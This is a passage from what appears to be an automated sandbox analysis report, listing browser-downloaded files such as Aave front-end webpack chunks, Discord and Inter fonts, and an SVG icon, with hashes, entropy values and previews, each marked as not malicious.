                                                                                                                                                                                                                                                  Preview:(self.webpackChunk_N_E=self.webpackChunk_N_E||[]).push([[4822],{56674:function(e,t,r){"use strict";r.d(t,{J:function(){return w},c:function(){return A}});let n=!1,i=!1;const o={debug:1,default:2,info:2,warning:3,error:4,off:5};let s=o.default,a=null;const u=function(){try{const e=[];if(["NFD","NFC","NFKD","NFKC"].forEach((t=>{try{if("test"!=="test".normalize(t))throw new Error("bad normalize")}catch(r){e.push(t)}})),e.length)throw new Error("missing "+e.join(", "));if(String.fromCharCode(233).normalize("NFD")!==String.fromCharCode(101,769))throw new Error("broken implementation")}catch(e){return e.message}return null}();var l,c;!function(e){e.DEBUG="DEBUG",e.INFO="INFO",e.WARNING="WARNING",e.ERROR="ERROR",e.OFF="OFF"}(l||(l={})),function(e){e.UNKNOWN_ERROR="UNKNOWN_ERROR",e.NOT_IMPLEMENTED="NOT_IMPLEMENTED",e.UNSUPPORTED_OPERATION="UNSUPPORTED_OPERATION",e.NETWORK_ERROR="NETWORK_ERROR",e.SERVER_ERROR="SERVER_ERROR",e.TIMEOUT="TIMEOUT",e.BUFFER_OVERRUN="BUFFER_OVERRUN",e.NUMERIC_FAULT="
                                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                  File Type:Web Open Font Format (Version 2), TrueType, length 39724, version 2.66
                                                                                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                                                                                  Size (bytes):39724
                                                                                                                                                                                                                                                  Entropy (8bit):7.994965715436545
                                                                                                                                                                                                                                                  Encrypted:true
                                                                                                                                                                                                                                                  SSDEEP:768:w35mZVsqT7RAo+6tbgLdolT9YSswcTWa+O/dm8ae41u37qt+:1xTO3kb0dolT998WhO/Hae4jt+
                                                                                                                                                                                                                                                  MD5:FF5ECCDE83F118CEA0224EBBB9DC3179
                                                                                                                                                                                                                                                  SHA1:0AD305614C46BDB6B7BB3445C2430E12AECEE879
                                                                                                                                                                                                                                                  SHA-256:13DA02CE62B1A388A7C8D6F3BD286FE774EE2B91AC63D281523E80B2A8A063BC
                                                                                                                                                                                                                                                  SHA-512:03DC88F429DD72D9433605C7C0F5659AD8D72F222DA0BB6BF03B46F4A509B17EC2181AF5DB180C2F6D11C02F39A871C651BE82E28FB5859037E1BBF6A7A20F6B
                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                                  URL:https://discord.com/assets/b21c5111a12372139409.woff2
                                                                                                                                                                                                                                                  Preview:wOF2.......,......|P.......B............................. .`..P..@..W........<.6.$..`..r.. ..<..F..`[pVq..w.SI..+.S.f;dS.i.. C.bj.6..w;./......OM&..[.mo-......4F`...SeR.XzP.g..j..L.....S.T(a..y.D...od./).....|l...zn...T..OpZP....c\....%.H..y..g.!..!..|._........O._.[.nJS..]..H....rd..#.?.n#.B.w.w...":.u...|.a..#.#N...q.z.Z.....".5...X...3|O...8>......(...H....M|.w.o.%.%..|5.'L.a.N.) ..G`.(1.je.#.~_.......!...7.e.......s.\.`G.^...h.B....tR.N..+"xU....3.F}0....z...@^..iB^....u&....._{.$]..........8k....?.c...^.~...A2...T.$.i.....Ycx!b~.x...3:g.[.!.X...fgt.duf.....uZW!....y..(].$.If_....g69.Ef.'{.ndC..Yt6..*.;..\..M......E'.^I....rFJ..)1|...q......!.m~......../M.........7!I.E...U..!"....:...T9{!=.+... ..es2.2.%.Ll.t.j.D .p..<...$.....%...IB"'..#H.D............;OWk..G.Y.V....\&.U{.V....N.h....S[Yg(......f..Uu......z2.(.r..3...,-...G....c.9^"..:..>.......Q....S......]D'.,.@4..w./S.ep`...].sGR....Vc.j...-.|..}_...*&.eg.G..e.u...(./S..+H.'.9\.k%..
                                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                  File Type:Web Open Font Format (Version 2), TrueType, length 106140, version 1.0
                                                                                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                                                                                  Size (bytes):106140
                                                                                                                                                                                                                                                  Entropy (8bit):7.996661600980398
                                                                                                                                                                                                                                                  Encrypted:true
                                                                                                                                                                                                                                                  SSDEEP:3072:JNQdKgDRY2QEdOWASkVB09yzqr4hP7a/lR8A:IdKgDRHcDsbt/rh
                                                                                                                                                                                                                                                  MD5:444A7284663A3BC886683EB81450B294
                                                                                                                                                                                                                                                  SHA1:1E94A0DFAC8BAB0947EA9B0B6FB663EBAD5CCEB5
                                                                                                                                                                                                                                                  SHA-256:C63158BABCB7902203ED73476CCF901DB34825EA524D4A36A52B5E5F97E1ABF7
                                                                                                                                                                                                                                                  SHA-512:7BE12803AAB99AC90DCB4D56EBDB682612F8ECFACA95A2B60A9B5B06F461ED2222CCF757280E40CF1D4860E67BC35D5391AE5479D6B7282EA075F7EE56BF53D1
                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                                  URL:https://app.aave.com/_next/static/media/Inter-Bold.579e0f95.woff2
                                                                                                                                                                                                                                                  Preview:wOF2............... ...>..............................(...J.`.......,..Q..T..6.$..N. ..Z...-[.3.....y/.%....x.iYkf?.}t....Z......d.....M}A........%oV.n(n.N...m.d...>..............okYD:....^.R.W.H..D..c.l.J..c.N J3.h..B.#.c6A.0QY.J*DI^p.bKa*(.4..5..Mk....<Sh...mKXD..rA.........$..Zw.4..1..Me.....d0.%.+.....(....j..B/aV(``..}...1..d...a.4.$...1J.."D..j(h!JX...@+U.QUg.....L...n.V..!..M.H.<..q2..n.....$.G.pp.\..PYO...""......E}}....Y.[...5kOq.....^.q.5...mN.;..1......:xx+...=.\.s<.Ql....sl.{N$..[...s........z0.O..>.Ur~.G.>:..i^.{.)tQ......G....y.a....*9.bB{mE?C....9...54......6..f...+....j].jt..i_&.i.*....].hzv...gp....;.9...!2n..e...W.dZ|.C...3.).?^../..)..D...........=q...dYp...6t..X@.@*.C.......[/!.. B.....x.aB"......-.......%Y...VU..`Y.q..2..:.r..G1.H`...../Y.eR.`....k....+h.C;..%'6BA.....m..5fT1wL...c^.=.b.S?.........s1.G.^4.s.MH.n..6;..d.a...:7...[9.>X....;w.....m.LS.6..H..7..........&..<^..$.........=........}.mI.8....GQ.....G*x.E..*w.(*...._
                                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                  File Type:ASCII text, with very long lines (54806), with no line terminators
                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                  Size (bytes):54806
                                                                                                                                                                                                                                                  Entropy (8bit):5.565697823544884
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:1536:sM7O/3/5S/kohCY1cdVg3n/sgjvSCC94JFc:sM7O/3/w/kohCYOdVgXUKvE947c
                                                                                                                                                                                                                                                  MD5:A2A9F365A6265B82ED28B9FC601BAB09
                                                                                                                                                                                                                                                  SHA1:28D0A3D79F0AC2E986757B113CDB96C59C1F36E0
                                                                                                                                                                                                                                                  SHA-256:B4EEA063B44A2E70198B2C4F061240CCF7F95AA83EDA0AE7584993094AF84A84
                                                                                                                                                                                                                                                  SHA-512:E8AD23A5D3B98C28292206DDCA4B350183AD1416886D735D12E2DD2504A3DDFF5146E9BDE80A8FF2985C78248B82CB72B475166C8210C8C966F884B220E73DF9
                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                                  Preview:"use strict";(self.webpackChunk_N_E=self.webpackChunk_N_E||[]).push([[8420],{87054:function(e,t,r){r.d(t,{Z:function(){return y}});var n=r(63366),o=r(87462),a=r(67294),i=r(86010),s=r(94780),l=r(41796),c=r(83187),u=r(36622),d=r(78884),p=r(81719),b=r(34867);function h(e){return(0,b.Z)("MuiToggleButton",e)}var x=(0,r(1588).Z)("MuiToggleButton",["root","disabled","selected","standard","primary","secondary","sizeSmall","sizeMedium","sizeLarge"]),f=r(85893);const v=["children","className","color","disabled","disableFocusRipple","fullWidth","onChange","onClick","selected","size","value"],m=(0,p.ZP)(c.Z,{name:"MuiToggleButton",slot:"Root",overridesResolver:(e,t)=>{const{ownerState:r}=e;return[t.root,t[`size${(0,u.Z)(r.size)}`]]}})((({theme:e,ownerState:t})=>{let r,n="standard"===t.color?e.palette.text.primary:e.palette[t.color].main;return e.vars&&(n="standard"===t.color?e.vars.palette.text.primary:e.vars.palette[t.color].main,r="standard"===t.color?e.vars.palette.text.primaryChannel:e.vars.pa
                                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                  File Type:SVG Scalable Vector Graphics image
                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                  Size (bytes):478
                                                                                                                                                                                                                                                  Entropy (8bit):5.288251907947818
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:12:t41ucO3y5T8JT+0UqimI/60DIcyWWRo/a8kOI:t41TYJJCf0K6YhTWRhL
                                                                                                                                                                                                                                                  MD5:E65C7816155780A3371BBE3BDBCA9327
                                                                                                                                                                                                                                                  SHA1:C40E47118A35D0535357BE637042E4EC8D64F656
                                                                                                                                                                                                                                                  SHA-256:FBDD4B29247F2DDAAC2FB5482CCD12A757FBBC372F70E8CCBC2995126A8EEF6A
                                                                                                                                                                                                                                                  SHA-512:478D38BFF1B763B358F1D095E1277822A280AD382D39C0C5605183E226A01F83CF73210E456596C55FCF6473B44092282F755CCCACAE6627FAE91270A580A337
                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                                  Preview:<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 400 400" style="enable-background:new 0 0 400 400" xml:space="preserve"><defs><clipPath id="a"><circle cx="200" cy="200" r="200"/></clipPath></defs><g clip-path="url(#a)"><path style="fill-rule:evenodd;clip-rule:evenodd;fill:#fff" d="M0 0h400v400H0z"/><path d="m316 199-66.7-66.4v48.6l-66.2 48.7h66.2v35.5L316 199zm-235 0 66.7 66.4v-48.3l66.2-49.1h-66.2v-35.5L81 199z" style="fill-rule:evenodd;clip-rule:evenodd"/></g></svg>.
                                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                  File Type:ASCII text, with very long lines (17999), with no line terminators
                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                  Size (bytes):17999
                                                                                                                                                                                                                                                  Entropy (8bit):5.3461849776191706
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:384:W0ZgR0IFVkEuku9ZS+1QIn2i/LND5lFbtQR0eTuN5qNAPgsYprx4BzZ9w:W0+C++1Hn2wpFbtQ8fqNbsYpr6BI
                                                                                                                                                                                                                                                  MD5:AEB4B75242C0596883D15DAB60DE970E
                                                                                                                                                                                                                                                  SHA1:096A104EE8A232349E8F07BB320D57FD5015498F
                                                                                                                                                                                                                                                  SHA-256:74A03F1CEBB5271446C07D491D407E2CAB97D88560A5BE2BBD7F4F36753B6775
                                                                                                                                                                                                                                                  SHA-512:6A81FA24DA8F8F713D97E06323B44C7766021A7BA07E7F508F59613BC2A1D254115085582D838940D929D2AE9C3CD4B32DBFCE67D5C5E55A6E2492BDA584CFDF
                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                                  Preview:"use strict";(self.webpackChunk_N_E=self.webpackChunk_N_E||[]).push([[6538],{89722:function(e,n,t){t.d(n,{Z:function(){return v}});var r=t(87462),o=t(63366),i=t(67294),s=t(86010),a=t(94780),c=t(81719),l=t(78884),u=t(36622),d=t(34867);function p(e){return(0,d.Z)("MuiIcon",e)}(0,t(1588).Z)("MuiIcon",["root","colorPrimary","colorSecondary","colorAction","colorError","colorDisabled","fontSizeInherit","fontSizeSmall","fontSizeMedium","fontSizeLarge"]);var m=t(85893);const f=["baseClassName","className","color","component","fontSize"],x=(0,c.ZP)("span",{name:"MuiIcon",slot:"Root",overridesResolver:(e,n)=>{const{ownerState:t}=e;return[n.root,"inherit"!==t.color&&n[`color${(0,u.Z)(t.color)}`],n[`fontSize${(0,u.Z)(t.fontSize)}`]]}})((({theme:e,ownerState:n})=>({userSelect:"none",width:"1em",height:"1em",overflow:"hidden",display:"inline-block",textAlign:"center",flexShrink:0,fontSize:{inherit:"inherit",small:e.typography.pxToRem(20),medium:e.typography.pxToRem(24),large:e.typography.pxToRem(36)
                                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                  File Type:ASCII text, with very long lines (15744), with no line terminators
                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                  Size (bytes):15744
                                                                                                                                                                                                                                                  Entropy (8bit):5.248482024601397
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:192:eWdEOWhlahl+PSaq3qAdzTpw5Ur664iCCw79AyIxLsu9qWZkuJsb6:MbS733pTqjPiCC69mLeW
                                                                                                                                                                                                                                                  MD5:33A79C9556F37933B9CB90566F1D1AD1
                                                                                                                                                                                                                                                  SHA1:8020F6502557AFC541179470FFD04E3FBEB7D0B0
                                                                                                                                                                                                                                                  SHA-256:15276E68799F7F3BAF8CDB0E61517941ED276E81DEDF0D4F5FB4A31F8549D004
                                                                                                                                                                                                                                                  SHA-512:A5981F6B139D05D14B2C73B8B01B635BCE2A2DED7CE212CAE78A22D0192299468DDF3CB20055FAF8BEA4311BB3D13242ECDCCE4AD6B744FB71CC28A2A849A9C2
                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                                  Preview:"use strict";(self.webpackChunk_N_E=self.webpackChunk_N_E||[]).push([[7603],{57333:function(t,e,r){var o=r(67294);function n(){}function a(t){return!!(t||"").match(/\d/)}function i(t){return null===t||void 0===t}function s(t){return t.replace(/[-[\]/{}()*+?.\\^$|]/g,"\\$&")}function u(t,e){void 0===e&&(e=!0);var r="-"===t[0],o=r&&e,n=(t=t.replace("-","")).split(".");return{beforeDecimal:n[0],afterDecimal:n[1]||"",hasNagation:r,addNegation:o}}function l(t,e,r){for(var o="",n=r?"0":"",a=0;a<=e-1;a++)o+=t[a]||n;return o}function p(t,e){return Array(e+1).join(t)}function c(t,e){if(t.value=t.value,null!==t){if(t.createTextRange){var r=t.createTextRange();return r.move("character",e),r.select(),!0}return t.selectionStart||0===t.selectionStart?(t.focus(),t.setSelectionRange(e,e),!0):(t.focus(),!1)}}function f(t,e,r){return Math.min(Math.max(t,e),r)}function h(t){return Math.max(t.selectionStart,t.selectionEnd)}var m={displayType:"input",decimalSeparator:".",thousandsGroupStyle:"thousand",fixe
                                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                  File Type:Web Open Font Format (Version 2), TrueType, length 137140, version 2.459
                                                                                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                                                                                  Size (bytes):137140
                                                                                                                                                                                                                                                  Entropy (8bit):7.998481140044296
                                                                                                                                                                                                                                                  Encrypted:true
                                                                                                                                                                                                                                                  SSDEEP:3072:kX89D4n2tV29WN9z2uXw/hqzr7IbI1O1KfB9Bk8WnRSqv2WDc+FC5:kn2tS/IzXIbIo1KZWUqv2W8
                                                                                                                                                                                                                                                  MD5:F9BF0F65660D23C6F359D22720FC55AE
                                                                                                                                                                                                                                                  SHA1:9FA19AB7EA56165E2138C443816C278D5752DD08
                                                                                                                                                                                                                                                  SHA-256:426AE06CD942849AB48B84C287C760F3701B603EBCC5C9AAA4A89923EF5F058E
                                                                                                                                                                                                                                                  SHA-512:436019A96E47848533684A34E3C360F516C29B2AA2473D0A05D50C0FD3AD19EAC39DF2DE12B6EC1C6760493EFB5ABF58E6A54D32080226FA1765983435634D88
                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                                  URL:https://discord.com/assets/f5b8aa3411dfc24ff2e6.woff2
                                                                                                                                                                                                                                                  Preview:wOF2..............0....U..........................f........`........$..U.6.$..T..X.. ......[..[.;......w.N....ZjU...]".u..$.k..<..1...3@i...6.I.X......@ydf.h#..................{I~<:..I..C_........#.]7i..q[.+PF.U...x.......1..b..31Va....aB......n.V..&.Q.3cc.L...1f6.-:x.G..`EE.....r ......6..r..F.u..<|..aEX.V......c.L.,....RX....V....FQ.u..q.^.{q.]#.y..I.....19c$..j...k...W.......+.....H.dy....-.c.....X<<.....@.Q=.........:....+....F..z.K..Y..{t..{.*.p..".I......M.X|t........}......nk42...S\.....$H...0...m......#f>EU..-z.k|.. ..Y.'..;<?.......S.C...............weU"...ES.2.>.%...O..q.@....F...0.aR.F|[a..Vq...z|HQ_m-j.3x1.XX.p...T./...z.p|..<-...%;Fx.....8CG&d..FQ.{.'.*.1...1#7..a?.;.G.....~U..4.F..*..*.Q.f...3..t:.~..o};"+...O....>D.x)%.. .O:.x.`N..]..uG.....C.!......%z..g...ZT.p.........5.......@!.S#/6$.k%..]...b=. $0gOC.]G\..lU....DH...(..;.e.B.!GH.5.eY.eY...-.m.....\..&.KYF3...-..........-......d..V.&w..... ..{..C.SZ...p)...d.w,...<....}.@
                                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                  File Type:ASCII text
                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                  Size (bytes):119
                                                                                                                                                                                                                                                  Entropy (8bit):4.2353369490250445
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:3:LUQAy0xDTFL7sdO0CKdJ8EQNKRFWezD/t/ww:LUJdxDTFL7sdJCKLKBezD/L
                                                                                                                                                                                                                                                  MD5:D11261FE9AD891056292393617E4D890
                                                                                                                                                                                                                                                  SHA1:423C94D8A0208524E385A44FFCED76F24221174B
                                                                                                                                                                                                                                                  SHA-256:48E6D98B703086C8C34C199C4DF170C4F4140CA767C15D59DEED900F838E97F6
                                                                                                                                                                                                                                                  SHA-512:8E004B52375D997CC7821735835050F944D3802D2BABA35B92651B78E2DB8B9ADB22B4FCC791F0A7A92422A713E56DB8FCF215678444E03C175AE9C144642760
                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                                  Preview:Bad Request.websocket: the client is not using the websocket protocol: 'upgrade' token not found in 'Connection' header
                                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                  File Type:Web Open Font Format (Version 2), TrueType, length 98868, version 1.0
                                                                                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                                                                                  Size (bytes):98868
                                                                                                                                                                                                                                                  Entropy (8bit):7.997348664849209
                                                                                                                                                                                                                                                  Encrypted:true
                                                                                                                                                                                                                                                  SSDEEP:1536:kWKd1QBjcSqfPdRBUJEW8yB7F2W4Ob2RdFoEw1r4FM9OcU/0UDTTj:m10zEWfB7GObYof1r5icUH
                                                                                                                                                                                                                                                  MD5:DC131113894217B5031000575D9DE002
                                                                                                                                                                                                                                                  SHA1:F96348260751EA78B1D23E9557DB297290BDAF28
                                                                                                                                                                                                                                                  SHA-256:D612F1212B452AF07F1A5DEFB2B672E76A91F7139E7499FA48BB9B2B985C22D6
                                                                                                                                                                                                                                                  SHA-512:0AA4420C7B7DCC70238371F9D21D521D0673CAF4C1883EEB2D3254C5A1DAD941F4569F418350FFC61E93303466C504179B90BA0ACF008250DC9C2C6DDF6F850B
                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                                  URL:https://bafybeihwopeeamsw6gk3vbg3wbftvt3n2qngbzo5a4hlnpvlv4hc3vvmyy.ipfs.dweb.link/_next/static/media/Inter-Regular.f1f0c35b.woff2
                                                                                                                                                                                                                                                  Preview:wOF2.......4..........................................F...J.`..........9..T..6.$..N. ..r...-[....Jl..\Z 8...B.J.....9..m..nN...g....?^.AD!.......J.u.YW.s..)..[.J.<...............o$.....}.y#/!a.....(.2.V.X.G.j$...!d1/:.P.U..(.C..1.3...,.G..Y.'..\....$s....Y...h.........C}...yE|.e.k..WK.b[U.P].b.P..J&U.......o...9..p...2...N#....)..U,..".=..q[...S..E...U..U...`......r.Vx...T.*K.."j....q....R\......1.J9w..H]<..w..A..\o..:./...U..n.G..S...>...Z3.....&4.z.......^...d..J}L.U].-?...z..M.(.u.t.v.......['...iNP..VP..3.....{D...((l...^.....=..P...=.'....ry..aa....\ba.m.#.^...d..p.|.g.l...e..o.CB..k..2:....b,.".......=a.5.l./..............@../y...<..w1.C.(imM9...jW..L`...~...a....#....8.....(.Xg.t.9...s...m.H.?.x.v...v.....z'k6.?..y~.c%....>..[%S...(..k.{....+......)s.=.....!.+...7C.../..G/.....!X:...6+-..,<...&..4.....^.S...E>|Gi0....?.?^..r.M..E...3FT.&;..9....<..Sw-:..f.z9.}=Kn......"&...8...^s.mf.B..9...oh.O...2...lj|.#.U.H'...{.`..X.....e .AZ...T...
                                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                  File Type:ASCII text, with very long lines (15005), with no line terminators
                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                  Size (bytes):15005
                                                                                                                                                                                                                                                  Entropy (8bit):5.528594448989494
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:192:FCyauhsPCZtMWOQAW/VDtmKYI4xxPoHG1Lo1rFoQBVo1NOwfN2WuGsmgl7L/:o6AWv8IqxPoHILo1eQBVLUN2xplv/
                                                                                                                                                                                                                                                  MD5:3AAF9CC76EE4BA3CF674FA5EEE750FAE
                                                                                                                                                                                                                                                  SHA1:2C64D9FBD26F628D70F38BF59E65AC65D0A588C4
                                                                                                                                                                                                                                                  SHA-256:CE83AA73D449364B8DADB5539E750C4517174396EAF2F8C8B531633ED57C07DB
                                                                                                                                                                                                                                                  SHA-512:57FE7B4FBA807DB54CC1F3105A3CEA32822C6482ABDD75820FD93087E005AEB86C62EFC3EB2B01360C50FC348A741B7569F127F9E94A26982C0694A9CEBB7FBB
                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                                  Preview:"use strict";(self.webpackChunk_N_E=self.webpackChunk_N_E||[]).push([[7604],{76920:function(e,r,t){var n,i,o=t(67294);function s(){return s=Object.assign?Object.assign.bind():function(e){for(var r=1;r<arguments.length;r++){var t=arguments[r];for(var n in t)Object.prototype.hasOwnProperty.call(t,n)&&(e[n]=t[n])}return e},s.apply(this,arguments)}r.Z=function(e){return o.createElement("svg",s({viewBox:"0 0 12 12",fill:"none",xmlns:"http://www.w3.org/2000/svg"},e),n||(n=o.createElement("path",{fillRule:"evenodd",clipRule:"evenodd",d:"M6.78.628a.6.6 0 0 1 .42.572v3h2.4a.6.6 0 0 1 .492.944l-4.2 6A.6.6 0 0 1 4.8 10.8v-3H2.4a.6.6 0 0 1-.492-.944l4.2-6A.6.6 0 0 1 6.78.628Z",fill:"url(#lightningBoltGradient_svg__a)"})),i||(i=o.createElement("defs",null,o.createElement("linearGradient",{id:"lightningBoltGradient_svg__a",x1:10.2,y1:4.672,x2:1.345,y2:7.335,gradientUnits:"userSpaceOnUse"},o.createElement("stop",{stopColor:"#B6509E"}),o.createElement("stop",{offset:1,stopColor:"#2EBAC6"})))))}},96875
                                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                  File Type:ASCII text, with very long lines (23552), with no line terminators
                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                  Size (bytes):23552
                                                                                                                                                                                                                                                  Entropy (8bit):5.468472558609081
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:384:MaJyrR/WmyO0/z4ij53g4tZkSX27VgTM9eqPTb/F:X0Elh5w4tZkSX27mITbF
                                                                                                                                                                                                                                                  MD5:197740C77B76EFF728028E9DE793944B
                                                                                                                                                                                                                                                  SHA1:EAC0D21401A55AF1DF486A5D07E522B1653119F1
                                                                                                                                                                                                                                                  SHA-256:A55EC5364080B18CF04A0CFD921959B02D03C926CE24C5A31835817D5A64E369
                                                                                                                                                                                                                                                  SHA-512:F87B105B0AA1939215CE1AF758A32DF90727FD1E82328DB1DAA6BECC727C6B0E0716CAF6A42197E39265BD46C5C89FD0EA2BF70ED76DA508BFED50A0212B90D6
                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                                  Preview:"use strict";(self.webpackChunk_N_E=self.webpackChunk_N_E||[]).push([[1811],{81811:function(e,t,r){r.r(t),r.d(t,{RepayModal:function(){return Ae}});var n=r(59499),a=r(49501),o=r(67294),s=r(47130),i=r(46839),l=r(8195),u=r(46930),c=r(63206),d=r(31959),p=r(94635),m=r(75331),y=r(1279),b=r(52358),f=r(30120),v=r(81645),x=r(29630),h=r(9144),g=r(70794),A=r(25935),S=r(41024),j=r(72667),T=r(74119),w=r(50029),O=r(87794),C=r.n(O),k=r(25808),E=r(77537),P=r(20301),R=r(68448),D=r(53601),B=r(93608),L=r(57824),N=r(94671),I=r(99730),U=r(17674),W=r(4730),Z=r(80854),_=r(21732),M=r(78371),F=r(67489),Y=r(85893),H=["repayAmount","poolReserve","fromAssetData","isWrongNetwork","sx","symbol","rateMode","repayAllDebt","useFlashLoan","blocked","loading","repayWithAmount","buildTxFn"];function V(e,t){var r=Object.keys(e);if(Object.getOwnPropertySymbols){var n=Object.getOwnPropertySymbols(e);t&&(n=n.filter((function(t){return Object.getOwnPropertyDescriptor(e,t).enumerable}))),r.push.apply(r,n)}return r}function q(
                                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                  File Type:ASCII text, with very long lines (4768), with no line terminators
                                                                                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                                                                                  Size (bytes):4768
                                                                                                                                                                                                                                                  Entropy (8bit):5.531953924670438
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:96:3a2DXHcwlin8kmlWFxiK97RFuPukdIZS0meUfvQYJxuRMUNmLRSfsxFMuBugtOgf:zDswlwLFxiKbF6VdISr4YJxIL8LRQsxz
                                                                                                                                                                                                                                                  MD5:DC166250138041181DE591E21AA7192A
                                                                                                                                                                                                                                                  SHA1:C4A8A2A91FFC7BB0E31C0E1A77D23E620D679664
                                                                                                                                                                                                                                                  SHA-256:117970265C5AFD32CB55CF648A87AA89AFB4F6D23EB6F8F2691DA508BC208AA8
                                                                                                                                                                                                                                                  SHA-512:E71725052E86E1BA8ACDBC408C5BC6CBE5C96D3C24DBE4A6ED63C9C6FF425D81BE979417A8C925E6EF31F65B0DA527EB98AA7B981FFF8FBC8A42FCBA8B113A66
                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                                  URL:https://bafybeihwopeeamsw6gk3vbg3wbftvt3n2qngbzo5a4hlnpvlv4hc3vvmyy.ipfs.dweb.link/_next/static/chunks/9388.ff9a5272b437e6f3.js
                                                                                                                                                                                                                                                  Preview:"use strict";(self.webpackChunk_N_E=self.webpackChunk_N_E||[]).push([[9388],{89388:function(e,t,n){n.r(t),n.d(t,{StakeModal:function(){return G}});var r=n(67294),o=n(8195),a=n(31959),i=n(49501),s=n(75331),c=n(1279),u=n(29630),l=n(77912),d=n(60265),p=n(77537),m=n(78371),v=n(84568),k=n(63206),x=n(57609),f=n(54401),b=n(53601),g=n(63491),h=n(67916),j=n(93608),y=n(57824),N=n(78944),T=n(10343),O=n(59499),S=n(50029),A=n(4730),w=n(87794),E=n.n(w),P=n(89291),C=n(67489),_=n(85893),I=["amountToStake","isWrongNetwork","sx","symbol","blocked","selectedToken","event"];function D(e,t){var n=Object.keys(e);if(Object.getOwnPropertySymbols){var r=Object.getOwnPropertySymbols(e);t&&(r=r.filter((function(t){return Object.getOwnPropertyDescriptor(e,t).enumerable}))),n.push.apply(n,r)}return n}var U,W=function(e){var t=e.amountToStake,n=e.isWrongNetwork,r=e.sx,o=e.symbol,a=e.blocked,c=e.selectedToken,u=(e.event,(0,A.Z)(e,I)),l=(0,m.Y)(),d=l.stake,p=l.stakeWithPermit,v=c!==s.hj.bpt,k=(0,P.Q)({tryPermit:v,per
                                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                  File Type:ASCII text, with very long lines (7890), with no line terminators
                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                  Size (bytes):7890
                                                                                                                                                                                                                                                  Entropy (8bit):5.320661374510762
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:192:UvY88VxM9nRv+ZPMVF8XNkdvVMKNJAjBx:CQVCTmlE9BJyBx
                                                                                                                                                                                                                                                  MD5:50606DFF33E656CFB42A10A49676C0D5
                                                                                                                                                                                                                                                  SHA1:A4D3D2F081346BD71F04367AC418E793DEC76CD6
                                                                                                                                                                                                                                                  SHA-256:0BC6A3B242558A2A32FEDF076513607E35F41078D93162DA3AF670C278DE8D1D
